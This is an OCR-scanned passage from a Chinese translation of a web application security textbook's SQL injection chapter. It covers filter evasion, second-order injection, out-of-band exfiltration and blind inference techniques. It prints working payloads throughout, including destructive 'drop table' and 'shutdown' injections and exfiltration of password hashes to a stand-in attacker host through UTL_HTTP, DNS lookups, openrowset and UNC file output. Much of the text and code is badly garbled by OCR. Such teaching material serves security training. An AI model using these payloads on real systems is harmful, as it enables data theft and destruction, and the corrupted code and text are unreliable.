SELECT table name,column name FROM information schema.columns where 
Column name LIKE '%PASS%' 
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提示 “如果 目 标 表 返回 了 多 个 列 ， 则 可 以 将 这 些 列 串 连 到 单独 一 个 列 中 ， 这 样 检索 起 
来 会 更 加 方便 ， 因 为 这 时 只 需要 在 原始 查询 中 确定 一 个 varchar 字 段 : 
DQ Oracle: SELECT table name||':'||column name FROM all_tab_columns 


DD MS-SQL: SELECT table name+':'+column name from information schema. 
columns 
DQ MySQL: SELECT CONCAT (table name,':',column name) from information 


schema.columns 





9.2.8 避 开 过 滤 


有 了 时, 易 受 SQL 注入 攻击 的 应 用 程序 可 能 会 执行 各 种 输入 过 滤 以 防止 攻击 者 无 限制 地 利用 其 
中 存在 的 缺陷 。 例 如 ， 应 用 程序 可 能 会 删除 或 净化 某 些 字 符 ， 或 阻止 常用 的 SQL 关 键 字 。 这 种 过 
滤 通 常 非常 容易 避 开 ， 这 时 可 尝试 使 用 各 种 技巧 。 
1. 避免 使 用 被 阻止 的 字符 
如 果 应 用 程序 删除 或 编码 某 些 在 SQL 注入 攻击 中 经 常用 到 的 字符 , 不 使 用 这 些 字 符 仍 然 能 够 
实施 攻击 。 
口 如 果 要 注入 数字 数据 字段 或 列 名 称 ， 不 一 定 必 须 使 用 单 引 号 。 要 在 攻击 有 效 载荷 中 搬入 
字符 串 ， 不 使 用 引号 仍 可 以 做 到 这 一 点 。 这 时 ， 可 以 通过 各 种 字符 串 函 数 ， 使 用 每 个 字 
符 的 ASCII 代 码 动 态 构 建 一 个 字符 串 。 例 如 ， 下 面 两 个 查询 分 别 用 于 Oracle 和 MS-SQL， 


它们 等 同 于 select ename ,sal from emp where ename='marcus': 



































SELECT ename, sal FROM emp where ename=CHR(109) ||CHR(97) | 
ae 0 | |EnRi117 | |iRt11S 














SELECT ename, sal FROM emp WHERE ename=CHAR (109})+CHAR{97) 
+CHAR{(114}+CHAR (99)}+CHAR {117}+CHAR(11S) 


口 如 打 注 释 符 号 被 阻止 ， 通 第 可 以 设计 注入 的 数据 ,使 其 不 会 破坏 周围 查询 的 语法 。 例 如 ， 
不 用 注入 
' or 工 = 工 -一 
可 以 注入 


i 


口 在 MS-SQL 数 据 库 中 注入 批量 查询 时 , 不 必 使 用 分 写 分 隐 符 。 只 要 纠正 所 有 批量 查询 的 语 
法 ,无论 你 是 否 使 用 分 号 ， 查询 解 析 带 都 会 正确 解释 它们 。 


尝试 访问 
http://mdsec.net/addressbook/71/ 
http://mdsec.net/addressbook/76/ 
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2. 避免 使 用 简单 确认 

一 些 输入 确认 机 制 使 用 一 个 简单 的 黑 名 单 , 阻止 或 删除 任何 出 现在 这 个 名 单 中 的 数据 。 在 这 
种 情况 下 , 应 该 尝试 使 用 标准 的 攻击 方法 , 寻找 确认 和 规范 化 机 制 中 的 常见 缺陷 (如 第 2 章 所 述 )。 
例如 ， 如 有 末 SELECT 关 键 字 被 阻止 或 删除 ， 可 以 答 试 使 用 以 下 输入 : 

SeLeCt 

S00SELECT 


SELSELECTECT 
竺 3 宪 45 儿 4C 儿 45 针 43 名 54 

















多 2553 针 2545 名 254c%2545 名 2543 名 2554 


党 试 访 问 





http://mdsec.net/addressbook/S8/ 
http://mdsec.net/addressbook/62/ 


3. 使 用 SQL 注释 

与 C++ 一 样 ， 我 们 也 可 以 在 SQL 语句 中 插入 行内 注释 ,注释 内 容 包含 在 /* 与 */ 符 号 之 间 。 如 
条 应 用 程序 阻止 或 删除 输入 中 的 空格 ， 可 以 使 用 注释 “冒充 ”注入 数据 中 的 空 日 符 。 例 如 : 

SELECT/*foo*/username,pPpassword/*foo*/FROM/*foo*/users 

在 MySQL 中 ， 注 释 甚至 可 以 插入 关键 字 中 ， 这 种 方法 可 避 开 某 些 输入 确认 过 滤 ， 同 时 保留 
查询 中 的 语法 。 例 如 : 

SEL/*foo*/ECT username,password FR/*foo*/OM users 

4. 利用 有 缺陷 的 过 滤 

输入 确认 机 制 通 弟 包含 逻辑 缺陷 ， 可 对 这 些 缺 陷 加 以 利用 , 使 被 阻止 的 输入 避 开 过 小 。 多 数 
情况 下 ,这 类 攻击 会 利用 应 用 程序 在 对 多 个 确认 步 又 进行 排序 , 或 未 能 以 递归 方式 应 用 净化 逻辑 
方面 的 缺陷 。 我 们 将 在 第 11 半 介绍 这 类 攻击 。 


尝试 访问 


http://mdsec.net/addressbook/67/ 
































9.2.9 二 阶 SQL 注 入 


-种 特别 有 益 的 避 开 过 滤 的 方法 与 二 阶 SQL 注 入 (second-order SQL injection ) 有 关 。 当 数据 
首次 插入 数据 库 中 时 ， 许 多 应 用 程序 能 够 安全 处 理 这 些 数 据 。 但 是 ， 一 旦 数据 存储 在 数据 库 中 ， 
随后 应 用 程序 本 喘 或 其 他 后 端 进程 可 能 会 以 危险 的 方式 处 理 这 些 数据 。 许 多 这 类 应 用 程序 并 不 像 
面 回 因特网 的 主要 应 用 程序 一 样 安全 ， 但 却 拥有 较 高 权限 的 数据 库 账户 。 

在 一 些 应 用 程序 中 , 用户 输 入 在 到 达 时 通过 转 义 单 引 号 来 进行 确认 。 在 前 面 搜索 书籍 的 示例 
中 ， 这 种 方法 明显 有 效 。 当 用 户 输入 搜索 项 0'Reilly 时 ， 应 用 程序 执行 以 下 查询 : 
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SELECT author,title,year FROM books WHERE publisher = 'O''Reilly'’! 

在 这 个 查询 中 , 用户 提交 的 单 引 号 被 转换 为 两 个 单 引 号 ,因而 传送 给 数据 库 的 搜索 项 与 用 户 
最 初 输入 的 表达 式 具 有 相同 的 字符 含义 。 

与 单 引 号 配对 方法 有 关 的 问题 出 现在 更 复杂 的 情形 中 , 此 时 同一 个 数据 项 被 提交 给 几 个 SQL 
查询 ,然后 写 入 数据 库 被 几 次 读 取 ,这 是 证 明 简 单 输入 确认 相对 于 边界 确认 存在 不 足 的 一 个 示例 ， 
如 第 2 章 所 述 。 

回 到 前 面 那 个 允许 用 户 自 我 注册 并 且 在 一 个 INSERT 语 句 中 存在 SQL 注 入 漏洞 的 应 用 程序 。 
假设 开发 者 将 修复 出 现在 用 户 数据 中 的 所 有 单 引 号 配对 导致 的 漏洞 。 注 册 用 户 名 foo' 来 建立 如 
下 查询 ， 它 不 会 在 数据 库 中 造成 问题 : 


INSERT INTO users {username, password, ID, PrivVvs) VALUES ('foo'’! 
'Ssecret’', 2248, 1) 


目前 为 止 一 切 正 第 。 然而, 假设 应 用 程序 还 执行 密码 修改 功能 ,那么 只 有 通过 验证 的 用 户 才 
能 够 访问 这 项 功能 ， 而 且 为 了 加 强 保护 ， 应 用 程序 要 求 用 户 提 交 原 始 密码 。 然 后 应 用 程序 从 数据 
库 中 提取 用 户 的 当前 密码 ， 并 对 两 个 字符 串 进行 比较 , 核对 用 户 提 供 的 密码 是 否 正确 。 要 完成 核 
对 任务 ， 它 首先 要 从 数据 库 提取 用 户 的 用 户 名 ， 然 后 建立 如 下 查询 : 

SELECT PpPassword FROM users WHERE username = 'foo!'’ 

因为 保存 在 数据 库 中 的 用 户 名 是 字面 量 字 符 串 foo' ， 当 应 用 程序 提出 访问 要 求 时 ， 数 据 库 
即 返 回 这 个 值 ; 只 有 在 字符 串 被 传送 给 数据 库 时 才 使 用 配对 的 转 义 序列 。 因 此 ， 当 应 用 程序 重复 
使 用 这 个 字符 串 并 将 它 舱 入 到 男 一 个 查询 中 时 ， 就 会 造成 一 个 SQL 注 入 汤 洞 ， 用 户 最 初 的 恶意 输 
入 就 被 徐 人 到 查询 中 。 当 用 户 尝 试 修改 密码 时 ， 应 用 程序 返回 以 下 消息 ， 暴 露 了 上 述 缺 陷 : 

Unclosed quotation mark before the character string :foc 

要 利用 这 种 漏洞 ,攻击 者 只 需 注 册 一 个 包含 专门 设计 的 输入 用 户 名 ,然后 尝试 修改 密码 。 例 
如 ， 如 有 果 注 册 如 下 用 户 名 : 

'! or 1 in (select password from users where username='admin’'}—— 
注册 步骤 将 会 被 应 用 程序 安全 人 处理。 如 果 攻 击 者 笠 试 修改 密码 ,他 注入 的 查询 就 会 执行 ， 导 人 致 生 
成 以 下 消 且 ,泄露 管理 员 的 密码 : 


Microsoft OLE DB Provider for ODBC Drivers error '80040e07'! 


[Microsoft] [ODBC SQL Server Driver]|] [SQL Server]Syntax error converting 
















































































the varchar value 'fmeé9' to a column of data type int. 
攻击 者 已 经 成 功 避 开 旨 在 阻止 SQL 注入 攻击 的 输入 确认 , 现在 他 能 够 在 数据 库 中 执行 任意 查 
询 并 获得 查询 结果 。 


党 试 访 问 : 


http://mdsec.net/addressbook/107/ 
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9.2.10 ”高 级 利用 


到 现在 为 止 , 我们 描述 的 所 有 攻击 中 ,有 一 些 现 成 的 方法 可 帮助 从 数据 库 中 提取 有 用 的 数据 ， 
例如 ， 通 过 执行 UINION 攻 击 或 在 错误 消 居中 返回 数据 。 随 着 人 们 防御 SQL 注 入 威胁 意识 的 增强 ， 
这 种 情形 已 经 逐渐 消失 。 如 今 ， 即 使 遇 到 SQL 注入 漏洞 ， 攻 击 者 仍然 无 法 直接 获取 注入 的 查询 的 
结 采 ， 这 种 情况 日 益 增 多 。 我 们 将 讨论 儿 种 出 现 这 种 问题 的 情况 ， 以 及 如 何 处 理 这 些 情况 。 











注解 ”应 用 程序 所 有 者 应 意识 到 ， 并 非 所 有 攻击 都 旨 在 盗窃 敏感 数据 。 一 些 攻击 可 能 
更 具 破 坏 性 ， 例如， 仅仅 提交 12 个 字符 的 输入 ， 攻 击 者 就 能 够 使 用 关闭 命令 
( shutdown ) 关闭 一 个 MS-SQL 数 据 库 。 


' shutdown-- 


攻击 者 还 可 以 注入 恶意 命 4 可 删除 一 些 数据 库 表 : 


' drop table users-- 
' drop table accounts-- 
' drop table customers--— 





1. 获取 数字 数据 

如 果 包 含 单 引号 的 输入 得 到 正确 处 理 ， 那 么 应 用 程序 中 的 字符 串 字 段 就 不 易 受 SQL 注 入 攻 
击 。 但 是 ， 数字 数据 字 段 可 能 仍然 存在 漏洞 。 在 这 种 字段 中 ， 用 户 输 入 并 不 包含 在 单 引 号 中 。 这 
时 攻击 者 只 有 通过 应 用 程序 的 数值 啊 应 ( numeric response )， 才 能 获得 注入 查询 的 结果 。 

在 这 种 情况 下 ， 攻 击 者 需要 做 的 是 获取 数字 形式 的 有 用 数据 ， 对 注入 查询 的 结果 进行 处 理 。 
他 们 可 以 使 用 以 下 两 个 关键 函数 : 

口 AscII， 它 返回 输入 字符 的 ASCII 代 码 ; 

D SUBSTRING (或 Oracle 中 的 suBSTR )， 它 返回 输入 的 子 字 符 串 。 

这 些 子 数 可 结合 在 一 起 使 用 ， 以 数字 形式 从 一 个 字符 串 中 提取 单独 一 个 人 字符。 例如: 


SUBSTRING('Admin' 11) 返回 和 A 
ASCII('A') 返 回 65 


因此 

ASCII(SUBSTR('Admin',1,1) ) 返 回 65 

使 用 这 两 个 函数 , 可 以 系统 地 将 一 个 有 用 数据 的 字符 串 分 割 成 单个 的 字符 ,并 以 数字 形式 分 
别 返 回 每 一 个 字符 。 在 目 定 义 攻 击 中 ,可 以 利用 这 种 技巧 ， 以 一 次 一 个 字 节 的 速度 ， 迅 速 获 得 并 
重建 大 量 基于 字符 串 的 数据 。 


























提示 在 处 理 字符 串 操 作 和 数字 计算 方面 ,不同 数 据 库 平台 之 间 存 在 大 量 细微 的 区 
YY | 别 ， 当 实施 这 种 高 级 攻击 时 ,攻击 者 需要 意识 到 这 类 区 别 。 通 过 以 下 地 址 可 以 找到 说 


明 不 同 数据 库 之 间 这 些 区 别 的 详细 指南 : http://sqlzoo.net/howto/source/z.dir/i08fun.xml。 
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我 们 曾经 遇 到 上 述 问 题 的 另 一 种 表现 形式 ,， 即 应 用 程序 返回 的 并 不 是 真正 的 数字 , 而 是 一 些 
以 该 数字 为 标识 符 的 资源 。 应 用 程序 根据 用 户 的 输入 执行 一 个 SQL 查询 ， 获 得 一 个 文档 的 数字 标 
识 待 ， 然 后 将 文 档 的 内 容 返回 给 用 户 。 在 这 种 情况 下 ,攻击 者 可 以 和 匈 获 得 标识 符 在 相关 效 字 范 于 
内 的 每 一 份 文档 的 备份 ， 然 后 在 文档 内 容 与 标识 符 之 间 建 立 映 射 。 接 下 来 ， 当 实施 前 面 措 述 的 攻 
击 时 , 攻击 者 就 可 以 参考 这 个 映射 确定 应 用 程序 返回 的 每 个 文档 的 标识 符 ,， 因 而 得 到 他 们 成 功 提 
取 的 字符 的 ASCII 值 。 

2. 使 用 市 外 通关 

在 许多 SQL 注入 攻击 中 , 应 用 程序 并 不 在 用 户 的 浏览 硕 中 显示 注入 碍 询 的 结 朱 ,， 也 不 返回 数 
据 库 生成 的 任何 错误 消息 。 很 明显 ,在 这 种 情况 下 ， 即 使 一 个 SQL 注入 漏洞 确实 存在 ， 攻 击 者 也 
无 法 对 其 加 以 利用 , 提取 任意 数据 或 执行 任何 其 他 操作 。 但 是 ,这 种 想法 是 错误 的 ， 即 使 出 现 这 
种 情况 ， 仍 然 可 以 使 用 各 种 技巧 获取 数据 、 确 认 其 他 恶意 操作 是 否 取得 成 功 。 

许多 时 候 , 可 以 注入 任意 一 个 查询 , 但 却 无 法 获得 查询 结 琳 。 回 到 那个 易 受 攻击 的 登录 表单 ， 
它 的 用 记名 和 密码 字段 匈 于 遭受 SQL 注入 : 

SELECT * FROM users WHERE username = :marcus' and password = : Secret， 

除了 修改 查询 逻辑 以 避 开 登录 外 ,还 可 以 注入 一 个 完全 独立 的 子 查 询 , 使 用 字符 串 连 接 符 把 
这 个 子 查 询 的 结 来 与 控制 的 数据 项 连接 起 来 。 例 如 : 

foo' || (SELECT 1 FROM dual WHERE (SELECT username FROM all users WHERE 

username = 'DBSNMP') = 'DBSNMP')—-— 


应 用 程序 将 执行 以 下 查询 : 
SELECT * FROM users WHERE username = 'foo' || (SELECT 1 FROM dual WHERE 
(SELECT username FROM all users WHERE username = 'DBSNMP') = 'DBSNMP') 

数据 库 将 执行 注入 的 任何 子 查 启 ， 并 将 它 的 结果 附加 在 f0o 之 后 ,然后 查找 所 生成 用 户 名 的 
资料 。 当 然 , 这 种 登录 不 会 成 功 , 但 会 执行 注入 的 查询 。 在 应 用 程序 啊 应 中 收 到 的 只 是 标准 的 登 
录 失 败 消 上 朋 。 现 在 需要 想 办 法 获得 注入 查询 的 结 

如 果 能 对 MS-SQL 数 据 库 使 用 批量 查询 ( batch query ), 这 时 就 会 出 现 男 一 种 情形 。 批量 查询 特 
别 有 用 ， 因 为 它们 允许 执行 一 个 完全 独立 的 语句 ， 在 这 个 过 程 中 ,渗透 测试 员 拥 有 全 部 的 控制 权 ， 
可 以 使 用 为 外 的 SQL 语 句 并 针对 不 同 的 表 进 行 查询 ,但 是 ,因为 批量 查询 执行 查询 的 方式 比较 特殊 ， 
我 们 无 法 下 接 获 得 注入 查询 的 执行 结 宋 ,同样 第 要 想 办 法 获得 注入 查询 的 结 来 

在 这 种 情况 下 ,一 种 获取 数据 的 有 效 方法 是 使 用 带 外 通过 。 能 够 在 数据 库 中 执行 任意 SQL 语 
句 后 , 渗透 测试 员 往 往 可 以 利用 数据 库 的 一 些 内 置 功 能 在 数据 库 与 日 己 的 计算 机 之 间 建 立 网 络 连 
接 ， 通 过 它 传 送 从 数据 库 中 收集 到 的 任何 数据 。 

建立 适当 网 络 连接 的 方法 依 不 同 的 数据 库 而 定 , 而 且 取决 于 应 用 程序 访问 数据 库 所 使 用 的 用 
户 权 限 。 下 面 将 措 述 一 些 使 用 每 种 数据 库 时 最 党 用、 最 有 效 的 技巧 。 

© MS-SQL 

一 些 老式 数据 库 ， 如 MS-SQL2000 以 及 更 早 的 版 本 ， 可 使 用 openRowSet 命 令 与 外 部 数据 库 
建立 连接 并 在 其 中 搬入 任何 数据 。 例 如 ,下 面 的 查询 可 使 目标 数据 库 与 攻击 者 的 数据 库 建 立 连 接 ， 
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并 将 目标 数据 库 的 版 本 字符 串 插 入 表 foo 中 : 
insert into openrowset('SOQLOLEDB':, 
:DRIVER={SQL Server};SERVER=mAattacker.net,80;UID=sa; PWD=l]etmein’, 


'select * from foo’') values (@@Qversion) 
注意 , 可 以 指定 端口 80, 或 者 任何 其 他 可 能 的 值 , 以 提高 穿 透 防火 载 建立 外 部 连接 的 可 能 性 。 
@ Oracle 


Oracle 中 包含 大 量 低 权 限 用 户 可 访问 的 默认 功能 ， 可 以 使 用 它们 建立 带 外 连接 。 

UTL_HTTP 包 可 用 于 癌 其 他 主机 提出 任意 HTTP 请 求 。UTL_HTTP 包 含 丰富 的 功能 ， 并 支持 代 
理 服 务 古 、cookie、 重 定向 和 验证 。 这 意味 着 ， 如 果 攻 击 者 已 经 攻破 一 个 受到 强大 保护 的 企业 内 
部 网 络 中 的 数据 库 ， 他 就 能 够 利用 企业 代理 服务 器 与 因特网 建立 外 部 连接 。 

在 下 面 的 示例 中 ，UTL_HTTP 用 于 问 攻 击 者 控制 的 服务 器 传送 注入 查询 的 结果 。 


/employees.asp?EmPNo=7521' | |UTL HTTP.request ('mdattacker.net:80/'| 

(SELECTS20uUSername%®20FROM%®20all users%S20WHERES20ROWNUMS%S3d1))—— 

这 个 URL 促 使 UTL_HTTP 提 出 一 个 GET 请 求 ， 要 求 访问 包 仿 al1_users 表 中 第 一 个 用 户 名 的 
URL。 攻 击 者 只 需 在 mdattacker .net 安 装 一 个 netcat 监 昕 各 就 可 以 收 到 结果 。 

C:\>nc -np 80 


GET /SYS HITP/1.1 
Host: mdattacker.net 














Connection: close 


UTL_INADDR 包 则 在 将 主机 名 解析 为 IP 地 址 。 它 可 用 于 在 攻击 者 控制 的 服务 絮 中 生成 任意 
DNS 查 询 。 许 多 时 候 ， 相 比 于 UTL_HTTP 攻 击 ,， 这 类 攻击 更 可 能 取得 成 功 ， 因 为 即使 HTTP 流 量 被 
阻止 , 通常 DNS 流 量 仍 然 能 够 穿 透 企业 防火 墙 。 攻击 者 能 够 利用 这 个 包 查 找 选 择 的 主机 名 , 将 它 
作为 子 域 放 在 他 们 控制 的 一 个 域名 前 面 ， 以 此 迅速 获得 任意 数据 ， 例 如 


/employees.asp?EmopNo=7521 :||UTL_INADDR .GET_ HOST_NAME ({( (SELECT%20PASSWORDS 
20FROM%®20DBA_USERS%®20WHERE%20NAME-='SYS')||'.mdattacker.net'’) 


它 癌 包含 SYS 用 户 的 密码 散 列 ( password hash ) 的 mdattacker .net 名 称 服务 天 发 出 下 面 这 
个 DNS 查询 : 





DCB748A5BC5390F2.mdattacker.net 
UTL_SMTP 包 可 用 于 发 送 电 子 邮件 。 在 出 站 电子 邮件 中 发 送 这 个 包 ， 即 可 获得 大 量 从 数据 库 
中 截取 的 数据 。 
UTL_TCP 包 可 用 于 打开 任意 TCP 套 接 字 ， 以 发 送 和 接收 网 络 数据 。 











注解 ”在 Oracle llg 中 ，ACL 为 上 述 许多 资源 提供 保护 ， 以 防止 任意 数据 库 用 户 执 行 
恶意 操作 。 只 需 研究 一 下 Oracle 11g 中 提供 的 新 功能 ， 就 可 以 轻松 避 开 该 ACL， 使 用 


以 下 代码 即 可 实现 : 


SYS .DBMS_LDAP.INIT( (SELECT PASSWORD FROM SYS.USERS WHERE 
NAME='SYS') ||'.mdsec.net',80) 
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@ MySQL 

SELECT. . .INTO OUTFILE 命 令 可 将 任意 一 个 查询 的 输出 指 回 一 个 文件 。 指 定 的 文件 名 可 包 
含 UNC 路 径 ， 人 允许 将 输出 指 回 目 己 计算 机 上 的 一 个 文件 。 例 如 : 

select * into outfile :AAAmaattacker .net\‘\share\\output.txt' from users: 

要 想 接 收 到 文件 ， 必 须 在 计算 机 上 建立 SMB 共 享 ， 允许 匿 名 写 入 访问 。 可 以 在 基于 Windows 
和 UNIX 的 平台 上 配置 共享 ， 以 实现 匿名 写 人 。 如 采 无 法 接收 到 输出 的 文件 ， 可 能 是 因为 SMB 服 
务 需 的 配置 有 问题 。 可 以 使 用 一 个 嗅 探 亏 确 定 目标 服务 需 是 否 与 指定 计算 机 建立 了 入 站 连接 
(inbound connection )， 如 果 连 接 已 经 建立 ， 参 考 服务 需 文 档 资 料 确保 它 得 到 正确 配置 。 

e000 

通常 可 以 在 数据 库 服务 大 的 操作 系统 上 执行 任意 命令 ， 以 此 实施 权限 提升 攻击 。 这 时 ,攻击 
考 可 以 采用 许多 手段 获得 数据 ， 如 使 用 tftp、mail 和 telnet 等 内 置 命 令 ， 或 者 将 数据 复制 到 
Web 根 目录 使 用 浏览 器 获取 。 请 参阅 9.2.11 节 了 解 提 升 数据 库 权 限 的 各 种 技巧 。 

3. 使 用 推论 : 条 件 式 响应 

造成 市 外 通道 不 可 用 的 原因 有 许多 。 大 多 数 情 况 下 ,是 因为 数据 库 处 在 一 个 受 保护 的 网 络 中 ， 
它 的 边界 防火 墙 禁 止 任何 与 因特网 或 其 他 网 络 的 向 外 连接 。 这 时 ， 只 能 通过 Web 应 用 程序 注入 点 
( injection point ) 访问 数据 库 。 

在 这 种 情况 下 ,攻击 或 多 或 少 尖 有 部 目 性 质 , 但 攻击 者 仍然 可 以 使 用 各 种 技巧 从 数据 库 中 获 
得 任意 数据 。 这 些 技巧 全 都 基于 如 下 概念 : 使 用 一 个 注入 查询 有 条 件 地 在 数据 库 中 触发 某 种 可 以 
探测 的 行为 ， 然 后 根据 这 种 行为 是 否 发 生 推 断 出 所 知人 信息。 

回 到 那个 可 注入 用 户 名 和 密码 学 段 以 执行 任意 查询 的 登录 功能 : 

SELECT * FROM users WHERE Username = :marcus and password = 'secret'’ 

假设 还 没有 找到 将 注入 查询 的 结果 返回 给 浏览 右 的 方法 , 但 我 们 已 经 知道 如 何 使 用 SQL 注 入 
改变 应 用 程序 的 行为 。 例 如 ， 提 交 下 面 两 个 输入 将 得 到 截然 不 同 的 结果 : 


admin' AND 1=1-- 
admin' AND 1=2-- 


在 第 一 种 情况 中 , 应 用 程序 将 允许 攻击 者 以 管理 员 的 身份 登录 。 在 第 二 种 情况 中 , 登录 尝试 
将 会 失败 ， 因 为 1=2 这 个 条 件 总 为 假 。 可 以 利用 这 种 应 用 程序 行为 控制 推断 数据 库 中 任意 条 件 的 
真 假 。 例 如 ,使 用 前 面 描述 的 AscTI 和 SUBSsTRING 函 数 ， 攻 击 者 可 以 测试 截获 字符 串 中 的 一 个 字 
符 是 否 为 特定 的 值 。 例 如 ， 提交 下 面 这 段 输入 将 允许 攻击 者 以 管理 员 刁 份 登录 ,因为 经 测试 条 件 
为 真 : 








































































































admin，AND ASCIIT(SUBSTRING('RAdmin' ,1,1)) = 65-- 
但 是 ， 提 交 下 面 的 输入 ， 登 录 不 会 取得 成 功 ， 因 为 经 测试 条 件 为 假 : 
admin，AND ASCIT (SUBSTRING('AGmin',1,1)) = 66-- 























提交 大 量 这 类 查询 , 循环 每 个 字符 的 所 有 可 能 的 ASCII 编 码 ， 和 直到 出 现 一 个 “ 触 点 ”， 束 能 够 
以 每 次 一 个 字 市 的 速度 ， 提 取出 整个 字符 串 。 
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在 前 面 的 示例 中 ， 应 用 程序 拥有 一 些 主要 功能 ,可 以 通过 注入 一 个 现 有 的 SQL 查询 直接 控制 
它们 的 逻辑 。 攻 击 者 能 够 劫持 应 用 程序 计划 执行 的 行为 (成 功 或 失败 的 登录 ) 以 获得 想 要 的 信息 。 
然而 ,并 非 所 有 攻击 都 这 样 简 单 。 有 时 ,注入 的 查询 并 不 会 给 应 用 程序 的 行为 ( 如 日 志 机 制 ) 造 
成 直接 影响 。 或者， 应 用 程序 并 不 处 理 注入 的 一 个 子 查询 或 批量 查询 。 在 这 种 情况 下 ， 攻击 者 必 
须根 据 特定 的 条 件 ， 争 取 在 应 用 程序 中 造成 可 探测 的 行为 差异 。 

David Litchfield 发 现 了 一 种 技巧 ， 可 在 大 多 数 情况 下 触发 可 探测 的 行为 差异 。 其 核心 理念 是 
注入 一 个 查询 ， 依 照 某 个 特定 的 条 件 引 发 一 个 数据 库 错 误 。 如 果 发 生 数 据 库 错误 ， 可 以 通过 
HTTP5S00 啊 应 码 , 或 者 通过 某 种 错误 消息 或 反 浓 行为 (即使 错误 消息 本 身 并 未 揭示 任何 有 用 的 信 
息 )， 从 外 部 探测 到 这 个 错误 。 

这 种 技巧 利用 了 数据 库 在 求 条 件 语句 的 值 时 表现 出 的 一 个 行为 特点 : 数据 库 将 根据 其 他 部 分 
的 情况 ， 仅 对 那些 需要 求 值 的 语句 部 分 求 值 。 包 含 wHERE 子 句 的 SELECT 语句 就 是 表现 出 这 种 行 
为 的 一 个 典型 示例 : 

SELECT XX FROM Y WHERE CQ 

这 条 语句 使 数据 库 访 问 表 Y 的 每 一 行 ， 评 估 条 件 c。 如 果 条 件 c 为 真 ， 返 回 x。 如 果 条 件 c 永 为 
假 ， 永 远 不 求 出 表达 式 x 的 值 。 

可 以 找到 一 个 语法 有 效 但 如 果 求 值 就 会 生成 错误 的 表达 式 x, 对 这 种 行为 加 以 利用 。 在 Oracle 
与 MS-SQL 中 ， 被 零 除 计 算 就 是 这 样 的 表达 式 ， 如 1/0。 如 果 条 件 c 为 真 ， 那 么 求 表达 式 X 的 值 ， 
这 造成 一 个 数据 库 错 误 。 如 果 条 件 c 为 假 ， 就 不 会 发 生 错 误 。 因 此 ， 可 以 通过 是 否 发 生 错误 测试 
任意 一 个 条 件 c。 

下 面 的 查询 就 是 一 个 典型 的 示例 , 它 查 询 默 认 的 Oracle 用 户 DBSNMP 是 否 存 在 。 如 果 该 用 户 存 
在 ， 就 会 求 表 达 式 1/0 的 值 ， 造 成 一 个 错误 。 

SELECT 1/0 FROM dual WHERE {SELECT username FROM all users WHERE username = 

IDBSNME ') = DBSNME， 


下 面 的 查询 检查 虚构 用 户 AAAAAA 是 否 存在 。 因 为 WHERE 条 件 永 为 假 ， 所 以 不 求 表达 式 170 
的 值 ， 因 而 不 会 发 生 错 误 。 


SELECT 1/0 FROM qual WHERE (SELECT username FROM all users WHERE username = 
'AAAAAA') = 'AAAAAA! 


这 种 技巧 的 目的 是 在 应 用 程序 中 引发 一 个 条 件 性 响应 , 即使 注入 的 查询 不 会 给 应 用 程序 的 他 
辑 或 数据 处理 造成 影响 。 因此, 利用 它 就 可 以 使 用 前 面 描述 的 推论 技巧 在 各 种 情况 下 提取 到 所 需 
要 的 数据 。 而 且 , 由 于 这 种 技巧 非常 简单 ， 相 同 的 攻击 字符 串 可 应 用 于 一 系列 数据 库 ， 其 中 的 注 
入 点 则 位 于 各 种 类 型 的 SQL 语句 中 。 

这 种 技巧 的 用 途 非 常 广泛， 因为 它 可 以 用 在 可 以 注入 子 查 询 的 各 种 注入 点 中 。 例 如 : 

(select 1 Where <<condition>> or 170=0， 

以 一 个 提供 可 搜索 并 可 排序 的 联系 人 数据 库 的 应 用 程序 为 例 。 用 户 控 制 着 aepartment 和 


sort 参 数 : 
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/search.jsp?department=30&sort=ename 
以 上 代码 出 现在 以 下 后 端 查询 中 , 该 查询 确定 了 department 参 数 的 值 , 但 将 sort 参 数 连 接 
到 查询 中 : 














String gqueryText = "SELECT ename,]jJob,deptno,hiredate FROM emp WHERE deptno = ? 

ORDER BY ”+ request.getParameter ("sort") + " DESC": 

攻击 者 无 法 修改 WHERE 子 句 或 在 ORDER BY 子 句 后 进行 UINION 查 询 ， 但 攻击 者 可 以 通过 以 下 
语句 建立 某 种 推 新 条 件 : 


/Search.jJjsp?department=20&sort=(select%®%201/0%20from%20dual%®%20where%®20C 





(select%20substr(max(object name),1,1})%20FROM%S20user objects})='Y"') 

如 果 user_objects 表 中 的 第 一 个 对 和 象 名 称 的 第 一 个 字母 等 于 'Y' ， 将 导致 数据 库 尝试 对 1/0 求 
值 ， 这 会 导致 错误 ， 整 个 查询 不 会 返回 任何 结 末 。 如 末 第 一 个 字母 不 等 于 'Y' ， 原 始 查 询 的 结 来 
将 按 默 认 顺 序 返 回 。 通 过 对 Absinthe 或 SQLMap 之 类 的 SQL 注入 工具 仔细 设 定 这 个 条 件 ， 我 们 可 
以 检索 数据 库 中 的 每 一 条 记录 。 

e000UUU0O 

尽管 前 面 已 经 描述 了 各 种 复杂 的 技巧 , 但 是 ， 有 些 时 候 , 这 些 技 巧 可 能 全 部 无 效 。 有 些 情况 
下 ,可 以 注入 一 个 不 会 在 浏览 右 中 显示 结果 的 查询 , 但 由 于 无 法 建立 带 外 通道 ， 即 使 它 在 数据 库 
中 引发 错误 ， 也 并 不 会 给 应 用 程序 的 行为 造成 任何 影响 。 

在 这 种 情况 下 ， 幸 亏 NGSSoftware 的 Chris Anley 和 Sherief Hammad 发 现 了 一 个 技巧 ， 我 们 才 
不 至 于 手足 无 措 。 他 们 发 现 一 种 方法 ， 设 计 出 一 个 根据 攻击 者 指定 的 条 件 造成 时 间 延 到 的 查询 。 
攻击 者 可 以 提交 他 设计 的 查询 ,然后 监控 服务 器 做 出 啊 应 所 花 的 时 间 。 如 果 发 生 延 运 ， 攻 击 者 可 
推 凯 条 件 为 真 。 即 使 在 两 种 情况 下 应 用 程序 的 啊 应 完全 相同 , 攻击 者 仍然 可 根据 是 否 存在 时 间 延 
述 从 数据 库 中 提取 一 比特 数据 。 通 过 大 量 执行 这 类 查询 ,攻击 者 就 能 够 系统 性 地 从 数据 库 中 提取 
任何 复杂 的 数据 ， 每 次 一 比特 。 

引发 适当 时 间 延 到 方法 的 精确 性 取决 于 所 使 用 的 目标 数据 库 。MS-SQL 中 包含 一 个 内 置 
WAITFOR 命 令 ， 可 用 于 引起 一 个 指定 的 时 间 延 人 运 。 例 如， 如 果 当 前 数据 库 用 户 为 sa, 下 面 的 查询 
将 造成 5 秒 钟 的 时 间 延 迟 : 

if (select user) = 'sa’' waitfor delay :0:0:5， 

使 用 这 个 命令 ， 攻 击 者 就 能 够 以 各 种 方式 提取 任何 信息 。 一 种 方法 是 利用 前 面 已 经 描述 的 、 
